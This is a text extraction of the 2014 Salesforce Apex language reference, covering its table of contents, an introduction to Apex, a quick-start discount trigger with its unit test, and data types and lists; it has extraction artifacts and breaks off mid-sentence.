Salesforce Apex Language Reference PDF
Salesforce Apex Language Reference PDF
@salesforcedocs
Last updated: December 8, 2014
Copyright 20002014 salesforce.com, inc. All rights reserved. Salesforce is a registered trademark of salesforce.com, inc.,
as are other names and marks. Other marks appearing herein may be trademarks of their respective owners.
CONTENTS
GETTING STARTED
.................................................1
WRITING APEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Chapter 4: Data Types and Variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Data Types . . . . . . . . . . .
Primitive Data Types . . . . .
Collections . . . . . . . . . . .
Lists . . . . . . . . . . . .
Sets . . . . . . . . . . . .
Maps . . . . . . . . . . .
Parameterized Typing
Enums . . . . . . . . . . . . . .
Variables . . . . . . . . . . . .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
26
26
29
29
32
32
33
34
35
Contents
Constants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
Expressions and Operators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
Understanding Expressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
Understanding Expression Operators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
Understanding Operator Precedence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
Using Comments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
Assignment Statements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
Understanding Rules of Conversion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
49
49
50
50
50
Contents
Contents
Contents
Contents
FINISHING TOUCHES
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
Contents
Contents
Contents
Contents
Contents
Contents
Contents
APPENDICES
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1880
Contents
RunTestsRequest . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1894
RunTestsResult . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1894
DebuggingHeader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1897
PackageVersionHeader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1898
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1916
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1933
GETTING STARTED
CHAPTER 1
In this chapter ...
What is Apex?
Developing Code in
the Cloud
What's New?
Understanding Apex
Core Concepts
Introducing Apex
Salesforce has changed the way organizations do business by moving enterprise applications that were
traditionally client-server-based into an on-demand, multitenant Web environment, the Force.com
platform. This environment allows organizations to run and customize applications, such as Salesforce
Automation and Service & Support, and build new custom applications based on particular business
needs.
While many customization options are available through the Salesforce user interface, such as the ability
to define new fields, objects, workflow, and approval processes, developers can also use the SOAP API
to issue data manipulation commands such as delete(), update() or upsert(), from client-side
programs.
These client-side programs, typically written in Java, JavaScript, .NET, or other programming languages
grant organizations more flexibility in their customizations. However, because the controlling logic for
these client-side programs is not located on Force.com platform servers, they are restricted by:
The performance costs of making multiple round-trips to the Salesforce site to accomplish common
business transactions
The cost and complexity of hosting server code, such as Java or .NET, in a secure and robust
environment
To address these issues, and to revolutionize the way that developers create on-demand applications,
Salesforce introduces Force.com Apex code, the first multitenant, on-demand programming language
for developers interested in building the next generation of business applications.
What is Apex?more about when to use Apex, the development process, and some limitations
What's new in this Apex release?
Apex Quick Startdelve straight into the code and write your first Apex class and trigger
Introducing Apex
What is Apex?
What is Apex?
User Permissions Needed
EDITIONS
Author Apex
To define, edit, delete, set version settings, and show dependencies for Author Apex
Apex triggers:
Apex is a strongly typed, object-oriented programming language that allows developers to execute flow and transaction control
statements on the Force.com platform server in conjunction with calls to the Force.com API. Using syntax that looks like Java and acts
like database stored procedures, Apex enables developers to add business logic to most system events, including button clicks, related
record updates, and Visualforce pages. Apex code can be initiated by Web service requests and from triggers on objects.
You can add Apex to most system events.
Introducing Apex
Data manipulation language (DML) calls, such as INSERT, UPDATE, and DELETE, that include built-in DmlException
handling
Inline Salesforce Object Query Language (SOQL) and Salesforce Object Search Language (SOSL) queries that return lists of sObject
records
Looping that allows for bulk processing of multiple records at a time
Locking syntax that prevents record update conflicts
Custom public Force.com API calls that can be built from stored Apex methods
Warnings and errors issued when a user tries to edit or delete a custom object or field that is referenced by Apex
Easy to use
Apex is based on familiar Java idioms, such as variable and expression syntax, block and conditional statement syntax, loop syntax,
object and array notation, and so on. Where Apex introduces new elements, it uses syntax and semantics that are easy to understand
and encourage efficient use of the Force.com platform. Consequently, Apex produces code that is both succinct and easy to write.
Data focused
Apex is designed to thread together multiple query and DML statements into a single unit of work on the Force.com platform server,
much as developers use database stored procedures to thread together multiple transaction statements on a database server. Note
that like other database stored procedures, Apex does not attempt to provide general support for rendering elements in the user
interface.
Rigorous
Apex is a strongly-typed language that uses direct references to schema objects such as object and field names. It fails quickly at
compile time if any references are invalid, and stores all custom field, object, and class dependencies in metadata to ensure they are
not deleted while required by active Apex code.
Hosted
Apex is interpreted, executed, and controlled entirely by the Force.com platform.
Multitenant aware
Like the rest of the Force.com platform, Apex runs in a multitenant environment. Consequently, the Apex runtime engine is designed
to guard closely against runaway code, preventing it from monopolizing shared resources. Any code that violates limits fails with
easy-to-understand error messages.
Automatically upgradeable
Apex never needs to be rewritten when other parts of the Force.com platform are upgraded. Because compiled code is stored as
metadata in the platform, Apex is upgraded as part of Salesforce releases.
Easy to test
Apex provides built-in support for unit test creation and execution, including test results that indicate how much code is covered,
and which parts of your code could be more efficient. Salesforce ensures that all custom Apex code works as expected by executing
all unit tests prior to any platform upgrades.
Versioned
You can save your Apex code against different versions of the Force.com API. This enables you to maintain behavior.
Apex is included in Performance Edition, Unlimited Edition, Developer Edition, Enterprise Edition, and Database.com.
Introducing Apex
Apex
Use Apex if you want to:
Create Web services.
Create email services.
Perform complex validation over multiple objects.
Create complex business processes that are not supported by workflow.
Create custom transactional logic (logic that occurs over the entire transaction, not just with a single record or object).
Attach custom logic to another operation, such as saving a record, so that it occurs whenever the operation is executed, regardless
of whether it originates in the user interface, a Visualforce page, or from SOAP API.
Visualforce
Visualforce consists of a tag-based markup language that gives developers a more powerful way of building applications and customizing
the Salesforce user interface. With Visualforce you can:
Build wizards and other multistep processes.
Create your own custom flow control through an application.
Define navigation patterns and data-specific rules for optimal, efficient application interaction.
For more information, see the Visualforce Developer's Guide.
SOAP API
Use standard SOAP API calls if you want to add functionality to a composite application that processes only one type of record at a time
and does not require any transactional control (such as setting a Savepoint or rolling back changes).
For more information, see the SOAP API Developer's Guide.
Introducing Apex
When a developer writes and saves Apex code to the platform, the platform application server first compiles the code into an abstract
set of instructions that can be understood by the Apex runtime interpreter, and then saves those instructions as metadata.
When an end-user triggers the execution of Apex, perhaps by clicking a button or accessing a Visualforce page, the platform application
server retrieves the compiled instructions from the metadata and sends them through the runtime interpreter before returning the
result. The end-user observes no differences in execution time from standard platform requests.
Introducing Apex
What's New?
All Apex requests return a collection that contains from 1 to 50,000 records. You cannot assume that your code only works on a
single record at a time. Therefore, you must implement programming patterns that take bulk processing into account. If you dont,
you may run into the governor limits.
SEE ALSO:
Trigger and Bulk Request Best Practices
What's New?
Review the Winter 15 Release Notes to learn about new and changed Apex features in Winter 15.
Past Releases
For information about new features introduced in previous releases, see:
Summer 14 Release Notes
Spring 14 Release Notes
Winter 14 Release Notes
Summer 13 Release Notes
Spring 13 Release Notes
Winter 13 Release Notes
Summer 12 Release Notes
Spring 12 Release Notes
Winter 12 Release Notes
Summer 11 Release Notes
Spring 11 Release Notes
Winter 11 Release Notes
Summer 10 Release Notes
Spring 10 Release Notes
Winter 10 Release Notes
Summer 09 Release Notes
Spring 09 Release Notes
Winter 09 Release Notes
Summer 08 Release Notes
Spring 08 Release Notes
Winter 08 Release Notes
Summer 07 Release Notes
Spring 07 Release Notes
Introducing Apex
The section describes the basic functionality of Apex, as well as some of the core concepts.
Introducing Apex
For more information about using version settings with managed packages, see About Package Versions in the Salesforce online help.
Tip: Note that the semi-colon at the end of the above is not optional. You must end all statements with a semi-colon.
The following are examples of variable declarations:
// The following variable has the data type of Integer with the name Count,
// and has the value of 0.
Integer Count = 0;
// The following variable has the data type of Decimal with the name Total. Note
// that no value has been assigned to it.
Decimal Total;
// The following variable is an account, which is also referred to as an sObject.
Account MyAcct = new Account();
In Apex, all primitive data type arguments, such as Integer or String, are passed into methods by value. This means that any changes to
the arguments exist only within the scope of the method. When the method returns, the changes to the arguments are lost.
Non-primitive data type arguments, such as sObjects, are also passed into methods by value. This means that when the method returns,
the passed-in argument still references the same object as before the method call and can't be changed to point to another object.
However, the values of the object's fields can be changed in the method.
Using Statements
A statement is any coded instruction that performs an action.
In Apex, statements must end with a semicolon and can be one of the following types:
Assignment, such as assigning a value to a variable
Conditional (if-else)
Loops:
Do-while
While
For
Locking
Data Manipulation Language (DML)
Introducing Apex
Transaction Control
Method Invoking
Exception Handling
A block is a series of statements that are grouped together with curly braces and can be used in any place where a single statement
would be allowed. For example:
if (true) {
System.debug(1);
System.debug(2);
} else {
System.debug(3);
System.debug(4);
}
In cases where a block consists of only one statement, the curly braces can be left off. For example:
if (true)
System.debug(1);
else
System.debug(2);
Using Collections
Apex has the following types of collections:
Lists (arrays)
Maps
Sets
A list is a collection of elements, such as Integers, Strings, objects, or other collections. Use a list when the sequence of elements is
important. You can have duplicate elements in a list.
The first index position in a list is always 0.
To create a list:
Use the new keyword
Use the List keyword followed by the element type contained within <> characters.
Use the following syntax for creating a list:
List <datatype> list_name
[= new List<datatype>();] |
[=new List<datatype>{value [, value2. . .]};] |
;
The following example creates a list of Integer, and assigns it to the variable My_List. Remember, because Apex is strongly typed,
you must declare the data type of My_List as a list of Integer.
List<Integer> My_List = new List<Integer>();
Introducing Apex
To create a set:
Use the new keyword
Use the Set keyword followed by the primitive data type contained within <> characters
Use the following syntax for creating a set:
Set<datatype> set_name
[= new Set<datatype>();] |
[= new Set<datatype>{value [, value2. . .] };] |
;
The following example creates a set of String. The values for the set are passed in using the curly braces {}.
Set<String> My_String = new Set<String>{'a', 'b', 'c'};
The following example creates a map that has a data type of Integer for the key and String for the value. In this example, the values for
the map are being passed in between the curly braces {} as the map is being created.
Map<Integer, String> My_Map = new Map<Integer, String>{1 => 'a', 2 => 'b', 3 => 'c'};
Using Branching
An if statement is a true-false test that enables your application to do different things based on a condition. The basic syntax is as
follows:
if (Condition){
// Do this if the condition is true
} else {
// Do this if the condition is not true
}
10
Introducing Apex
Using Loops
While the if statement enables your application to do things based on a condition, loops tell your application to do the same thing
again and again based on a condition. Apex supports the following types of loops:
Do-while
While
For
A Do-while loop checks the condition after the code has executed.
A While loop checks the condition at the start, before the code executes.
A For loop enables you to more finely control the condition used with the loop. In addition, Apex supports traditional For loops where
you set the conditions, as well as For loops that use lists and SOQL queries as part of the condition.
For more information, see Loops on page 49.
11
CHAPTER 2
In this chapter ...
Using a Developer or
Sandbox
Organization
Learning Apex
Writing Tests
Deploying Apex to a
Sandbox
Organization
Deploying Apex to a
Salesforce Production
Organization
12
13
Learning Apex
Learning Apex
After you have your developer account, there are many resources available to you for learning about Apex:
Force.com Workbook: Get Started Building Your First App in the Cloud
Beginning programmers
A set of ten 30-minute tutorials that introduce various Force.com platform features. The Force.com Workbook tutorials are centered
around building a very simple warehouse management system. You'll start developing the application from the bottom up; that is,
you'll first build a database model for keeping track of merchandise. You'll continue by adding business logic: validation rules to
ensure that there is enough stock, workflow to update inventory when something is sold, approvals to send email notifications for
large invoice values, and trigger logic to update the prices in open invoices. Once the database and business logic are complete,
you'll create a user interface to display a product inventory to staff, a public website to display a product catalog, and then the start
of a simple store front. If you'd like to develop offline and integrate with the app, we've added a final tutorial to use Adobe Flash
Builder for Force.com.
Force.com Workbook: HTML | PDF
Apex Workbook
Beginning programmers
14
The Apex Workbook introduces you to the Apex programming language through a set of tutorials. Youll learn the fundamentals of
Apex and how you can use it on the Force.com platform to add custom business logic through triggers, unit tests, scheduled Apex,
batch Apex, REST Web services, and Visualforce controllers.
Apex Workbook: HTML | PDF
Salesforce Developers Apex Page
Beginning and advanced programmers
The Apex page on Salesforce Developers has links to several resources including articles about the Apex programming language.
These resources provide a quick introduction to Apex and include best practices for Apex development.
Force.com Cookbook
Beginning and advanced programmers
This collaborative site provides many recipes for using the Web services API, developing Apex code, and creating Visualforce pages.
The Force.com Cookbook helps developers become familiar with common Force.com programming techniques and best practices.
You can read and comment on existing recipes, or submit your own recipes, at http://developer.force.com/cookbook.
Development Life Cycle: Enterprise Development on the Force.com Platform
Architects and advanced programmers
Whether you are an architect, administrator, developer, or manager, the Development Life Cycle Guide prepares you to undertake the
development and release of complex applications on the Force.com platform.
Training Courses
Training classes are also available from Salesforce Training & Certification. You can find a complete list of courses at the Training &
Certification site.
In This Book (Apex Developer's Guide)
Beginning programmers should look at the following:
Introducing Apex, and in particular:
Documentation Conventions
Core Concepts
Quick Start Tutorial
Classes, Objects, and Interfaces
Testing Apex
Understanding Execution Governors and Limits
In addition to the above, advanced programmers should look at:
Trigger and Bulk Request Best Practices
Advanced Apex Programming Example
Understanding Apex Describe Information
Asynchronous Execution (@future Annotation)
Batch Apex and Apex Scheduler
15
Force.com IDE
The Force.com IDE is a plug-in for the Eclipse IDE. The Force.com IDE provides a unified interface for building and deploying Force.com
applications. Designed for developers and development teams, the IDE provides tools to accelerate Force.com application development,
including source code editors, test execution tools, wizards and integrated help. This tool includes basic color-coding, outline view,
integrated unit testing, and auto-compilation on save with error message display. See the website for information about installation and
usage.
Note: The Force.com IDE is a free resource provided by Salesforce to support its users and partners but isn't considered part of
our services for purposes of the Salesforce Master Subscription Agreement.
Tip: If you want to extend the Eclipse plug-in or develop an Apex IDE of your own, the SOAP API includes methods for compiling
triggers and classes, and executing test methods, while the Metadata API includes methods for deploying code to production
environments. For more information, see Deploying Apex on page 438 and SOAP API and SOAP Headers for Apex on page 1880.
16
Writing Tests
Writing Tests
Testing is the key to successful long-term development and is a critical component of the development process. We strongly recommend
that you use a test-driven development process, that is, test development that occurs at the same time as code development.
To facilitate the development of robust, error-free code, Apex supports the creation and execution of unit tests. Unit tests are class
methods that verify whether a particular piece of code is working properly. Unit test methods take no arguments, commit no data to
the database, send no emails, and are flagged with the testMethod keyword or the isTest annotation in the method definition.
Also, test methods must be defined in test classes, that is, classes annotated with isTest.
In addition, before you deploy Apex or package it for the Force.com AppExchange, the following must be true.
At least 75% of your Apex code must be covered by unit tests, and all of those tests must complete successfully.
Note the following.
When deploying to a production organization, every unit test in your organization namespace is executed.
Calls to System.debug are not counted as part of Apex code coverage.
Test methods and test classes are not counted as part of Apex code coverage.
While only 75% of your Apex code must be covered by tests, your focus shouldn't be on the percentage of code that is covered.
Instead, you should make sure that every use case of your application is covered, including positive and negative cases, as well
as bulk and single records. This should lead to 75% or more of your code being covered by unit tests.
Every trigger must have some test coverage.
All classes and triggers must compile successfully.
For more information on writing tests, see Testing Apex on page 413.
17
18
CHAPTER 3
Once you have a Developer Edition or sandbox organization, you may want to learn some of the core concepts of Apex. Because Apex
is very similar to Java, you may recognize much of the functionality.
After reviewing the basics, you are ready to write your first Apex programa very simple class, trigger, and unit test.
In addition, there is a more complex shipping invoice example that you can also walk through. This example illustrates many more
features of the language.
Note: The Hello World and the shipping invoice samples require custom fields and objects. You can either create these on your
own, or download the objects, fields and Apex code as a managed packaged from Force.com AppExchange. For more information,
see https://developer.salesforce.com/docs.
19
The previous code is the class definition to which you will be adding one method in the next step. Apex code is generally contained
in classes. This class is defined as public, which means the class is available to other Apex classes and triggers. For more information,
see Classes, Objects, and Interfaces on page 53.
3. Add this method definition between the class opening and closing brackets.
public static void applyDiscount(Book__c[] books) {
for (Book__c b :books){
b.Price__c *= 0.9;
}
}
This method is called applyDiscount, and it is both public and static. Because it is a static method, you don't need to create
an instance of the class to access the methodyou can just use the name of the class followed by a dot (.) and the name of the
method. For more information, see Static and Instance on page 60.
This method takes one parameter, a list of Book records, which is assigned to the variable books. Notice the __c in the object
name Book__c. This indicates that it is a custom object that you created. Standard objects that are provided in the Salesforce
application, such as Account, don't end with this postfix.
20
The next section of code contains the rest of the method definition:
for (Book__c b :books){
b.Price__c *= 0.9;
}
Notice the __c after the field name Price__c. This indicates it is a custom field that you created. Standard fields that are provided
by default in Salesforce are accessed using the same type of dot notation but without the __c, for example, Name doesn't end
with __c in Book__c.Name. The statement b.Price__c *= 0.9; takes the old value of b.Price__c, multiplies it
by 0.9, which means its value will be discounted by 10%, and then stores the new value into the b.Price__c field. The *=
operator is a shortcut. Another way to write this statement is b.Price__c = b.Price__c * 0.9;. See Understanding
Expression Operators on page 39.
4. Click Save to save the new class. You should now have this full class definition.
public class MyHelloWorld {
public static void applyDiscount(Book__c[] books) {
for (Book__c b :books){
b.Price__c *= 0.9;
}
}
}
You now have a class that contains some code that iterates over a list of books and updates the Price field for each book. This code is
part of the applyDiscount static method called by the trigger that you will create in the next step.
21
It gives the trigger a name, specifies the object on which it operates, and defines the events that cause it to fire. For example, this
trigger is called HelloWorldTrigger, it operates on the Book__c object, and runs before new books are inserted into the database.
The next line in the trigger creates a list of book records named books and assigns it the contents of a trigger context variable
called Trigger.new. Trigger context variables such as Trigger.new are implicitly defined in all triggers and provide access
to the records that caused the trigger to fire. In this case, Trigger.new contains all the new books that are about to be inserted.
Book__c[] books = Trigger.new;
The next line in the code calls the method applyDiscount in the MyHelloWorld class. It passes in the array of new books.
MyHelloWorld.applyDiscount(books);
You now have all the code that is needed to update the price of all books that get inserted. However, there is still one piece of the puzzle
missing. Unit tests are an important part of writing code and are required. In the next step, you will see why this is so and you will be
able to add a test class.
22
insert b;
// Retrieve the new book
b = [SELECT Price__c FROM Book__c WHERE Id =:b.Id];
System.debug('Price after trigger fired: ' + b.Price__c);
// Test that the trigger correctly updated the price
System.assertEquals(90, b.Price__c);
}
}
This class is defined using the @isTest annotation. Classes defined as such can only contain test methods. One advantage to
creating a separate class for testing is that classes defined with isTest don't count against your organization limit of 3 MB for all
Apex code. You can also add the @isTest annotation to individual methods. For more information, see IsTest Annotation on
page 81 and Understanding Execution Governors and Limits.
The method validateHelloWorld is defined as a testMethod. This means that if any changes are made to the database,
they are automatically rolled back when execution completes and you don't have to delete any test data created in the test method.
First the test method creates a new book and inserts it into the database temporarily. The System.debug statement writes the
value of the price in the debug log.
Book__c b = new Book__c(Name='Behind the Cloud', Price__c=100);
System.debug('Price before inserting new book: ' + b.Price__c);
// Insert book
insert b;
Once the book is inserted, the code retrieves the newly inserted book, using the ID that was initially assigned to the book when it
was inserted, and then logs the new price that the trigger modified:
// Retrieve the new book
b = [SELECT Price__c FROM Book__c WHERE Id =:b.Id];
System.debug('Price after trigger fired: ' + b.Price__c);
When the MyHelloWorld class runs, it updates the Price__c field and reduces its value by 10%. The following line is the
actual test, verifying that the method applyDiscount actually ran and produced the expected result:
// Test that the trigger correctly updated the price
System.assertEquals(90, b.Price__c);
3. Now lets switch to the Developer Console to run this test and view code coverage information. Click Your Name > Developer
Console.
The Developer Console window opens.
4. In the Developer Console, click Test > New Run.
5. To add your test class, click HelloWorldTestClass, and then click >.
6. To run the test, click Run.
The test result displays in the Tests tab. Optionally, you can expand the test class in the Tests tab to view which methods were run.
In this case, the class contains only one test method.
7. The Overall Code Coverage pane shows the code coverage of this test class. To view the lines of code in the trigger covered by this
test, which is 100%, double-click the code coverage line for HelloWorldTrigger. Also, because the trigger calls a method from the
MyHelloWorld class, this class has some coverage too (100%). To view the class coverage, double-click MyHelloWorld.
23
8. To open the log file, in the Logs tab, double-click the most recent log line in the list of logs. The execution log displays, including
logging information about the trigger event, the call to the applyDiscount class method, and the debug output of the price
before and after the trigger.
By now, you have completed all the steps necessary for writing some Apex code with a test that runs in your development environment.
In the real world, after youve sufficiently tested your code and youre satisfied with it, you want to deploy the code along with any other
prerequisite components to a production organization. The next step will show you how to do this for the code and custom object
youve just created.
24
WRITING APEX
CHAPTER 4
In this chapter ...
Data Types
Collections
Enums
Variables
Constants
Expressions and
Operators
Assignment
Statements
Understanding Rules
of Conversion
25
Data Types
Data Types
In Apex, all variables and expressions have a data type that is one of the following:
A primitive, such as an Integer, Double, Long, Date, Datetime, String, ID, or Boolean (see Primitive Data Types on page 26)
An sObject, either as a generic sObject or as a specific sObject, such as an Account, Contact, or MyCustomObject__c (see sObject
Types on page 102 in Chapter 4.)
A collection, including:
A list (or array) of primitives, sObjects, user defined objects, objects created from Apex classes, or collections (see Lists on page
29)
A set of primitives (see Sets on page 32)
A map from a primitive to a primitive, sObject, or collection (see Maps on page 32)
A typed list of values, also known as an enum (see Enums on page 34)
Objects created from user-defined Apex classes (see Classes, Objects, and Interfaces on page 53)
Objects created from system supplied Apex classes
Null (for the null constant, which can be assigned to any variable)
Methods can return values of any of the listed types, or return no value and be of type Void.
Type checking is strictly enforced at compile time. For example, the parser generates an error if an object field of type Integer is assigned
a value of type String. However, all compile-time exceptions are returned as specific fault codes, with the line number and column of
the error. For more information, see Debugging Apex on page 380.
Description
Blob
A collection of binary data stored as a single object. You can convert this datatype to String or from
String using the toString and valueOf methods, respectively. Blobs can be accepted as Web
service arguments, stored in a document (the body of a document is a Blob), or sent as attachments.
For more information, see Crypto Class.
Boolean
A value that can only be assigned true, false, or null. For example:
Boolean isWinner = true;
Date
A value that indicates a particular day. Unlike Datetime values, Date values contain no information
about time. Date values must always be created with a system static method.
You cannot manipulate a Date value, such as add days, merely by adding a number to a Date variable.
You must use the Date methods instead.
26
Data Type
Description
Datetime
A value that indicates a particular day and time, such as a timestamp. Datetime values must always
be created with a system static method.
You cannot manipulate a Datetime value, such as add minutes, merely by adding a number to a
Datetime variable. You must use the Datetime methods instead.
Decimal
A number that includes a decimal point. Decimal is an arbitrary precision number. Currency fields
are automatically assigned the type Decimal.
If you do not explicitly set the scale, that is, the number of decimal places, for a Decimal using the
setScale method, the scale is determined by the item from which the Decimal is created.
If the Decimal is created as part of a query, the scale is based on the scale of the field returned
from the query.
If the Decimal is created from a String, the scale is the number of characters after the decimal
point of the String.
If the Decimal is created from a non-decimal number, the scale is determined by converting the
number to a String and then using the number of characters after the decimal point.
Double
A 64-bit number that includes a decimal point. Doubles have a minimum value of -263 and a maximum
value of 263-1. For example:
Double d=3.14159;
Note that if you set ID to a 15-character value, Apex automatically converts the value to its
18-character representation. All invalid ID values are rejected with a runtime exception.
Integer
A 32-bit number that does not include a decimal point. Integers have a minimum value of
-2,147,483,648 and a maximum value of 2,147,483,647. For example:
Integer i = 1;
Long
A 64-bit number that does not include a decimal point. Longs have a minimum value of -263 and a
maximum value of 263-1. Use this datatype when you need a range of values wider than those
provided by Integer. For example:
Long l = 2147483648L;
Object
Any data type that is supported in Apexprimitive data types (such as Integer), user-defined custom
classes, the sObject generic type, or an sObject specific type (such as Account). All Apex data types
inherit from Object.
27
Data Type
Description
You can cast an object that represents a more specific data type to its underlying data type. For
example:
Object obj = 10;
// Cast the object to an integer.
Integer i = (Integer)obj;
System.assertEquals(10, i);
The next example shows how to cast an object to a user-defined typea custom Apex class named
MyApexClass that is predefined in your organization.
Object obj = new MyApexClass();
// Cast the object to the MyApexClass custom type.
MyApexClass mc = (MyApexClass)obj;
// Access a method on the user-defined class.
mc.someClassMethod();
String
String size: Strings have no limit on the number of characters they can include. Instead, the heap
size limit is used to ensure that your Apex programs don't grow too large.
Empty Strings and Trailing Whitespace: sObject String field values follow the same rules as in
the SOAP API: they can never be empty (only null), and they can never include leading and trailing
whitespace. These conventions are necessary for database storage.
Conversely, Strings in Apex can be null or empty, and can include leading and trailing whitespace
(such as might be used to construct a message).
The Solution sObject field SolutionNote operates as a special type of String. If you have HTML Solutions
enabled, any HTML tags used in this field are verified before the object is created or updated. If invalid
HTML is entered, an error is thrown. Any JavaScript used in this field is removed before the object is
created or updated. In the following example, when the Solution displays on a detail page, the
SolutionNote field has H1 HTML formatting applied to it:
trigger t on Solution (before insert) {
Trigger.new[0].SolutionNote ='<h1>hello</h1>';
}
In the following example, when the Solution displays on a detail page, the SolutionNote field only
contains HelloGoodbye:
trigger t2 on Solution (before insert) {
Trigger.new[0].SolutionNote =
'<javascript>Hello</javascript>Goodbye';
}
For more information, see HTML Solutions Overview in the Salesforce online help.
Escape Sequences: All Strings in Apex use the same escape sequences as SOQL strings: \b
(backspace), \t (tab), \n (line feed), \f (form feed), \r (carriage return), \" (double quote),
\' (single quote), and \\ (backslash).
28
Collections
Data Type
Description
Comparison Operators: Unlike Java, Apex Strings support use of the comparison operators ==,
!=, <, <=, >, and >=. Since Apex uses SOQL comparison semantics, results for Strings are collated
according to the context user's locale, and `are not case sensitive. For more information, see Operators
on page 39.
String Methods: As in Java, Strings can be manipulated with a number of standard methods. See
String Class for information.
Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime
error if you assign a String value that is too long for the field.
Time
A value that indicates a particular time. Time values must always be created with a system static
method. See Time Class.
In addition, two non-standard primitive data types cannot be used as variable or method types, but do appear in system static methods:
AnyType. The valueOf static method converts an sObject field of type AnyType to a standard primitive. AnyType is used within
the Force.com platform database exclusively for sObject fields in field history tracking tables.
Currency. The Currency.newInstance static method creates a literal of type Currency. This method is for use solely within
SOQL and SOSL WHERE clauses to filter against sObject currency fields. You cannot instantiate Currency in any other type of Apex.
For more information on the AnyType data type, see Field Types in the Object Reference for Salesforce and Force.com.
Collections
Apex has the following types of collections:
Lists
Maps
Sets
Note: There is no limit on the number of items a collection can hold. However, there is a general limit on heap size.
Lists
A list is an ordered collection of elements that are distinguished by their indices. List elements can be of any data typeprimitive types,
collections, sObjects, user-defined types, and built-in Apex types. For example, the following table is a visual representation of a list of
Strings:
Index 0
Index 1
Index 2
Index 3
Index 4
Index 5
'Red'
'Orange'
'Yellow'
'Green'
'Blue'
'Purple'
29
Lists
To declare a list, use the List keyword followed by the primitive data, sObject, nested list, map, or set type within <> characters. For
example:
// Create an empty list of String
List<String> my_list = new List<String>();
// Create a nested list
List<List<Set<Integer>>> my_list_2 = new List<List<Set<Integer>>>();
To access elements in a list, use the List methods provided by Apex. For example:
List<Integer> myList = new List<Integer>(); // Define a new list
myList.add(47);
// Adds a second element of value 47 to the end
// of the list
Integer i = myList.get(0);
// Retrieves the element at index 0
myList.set(0, 1);
// Adds the integer 1 to the list at index 0
myList.clear();
// Removes all elements from the list
For more information, including a complete list of all supported methods, see List Class on page 1553.
To reference an element of a one-dimensional list, you can also follow the name of the list with the element's index position in square
brackets. For example:
colors[0] = 'Green';
Even though the size of the previous String array is defined as one element (the number between the brackets in new String[1]),
lists are elastic and can grow as needed provided that you use the List add method to add new elements. For example, you can
add two or more elements to the colors list. But if youre using square brackets to add an element to a list, the list behaves like an
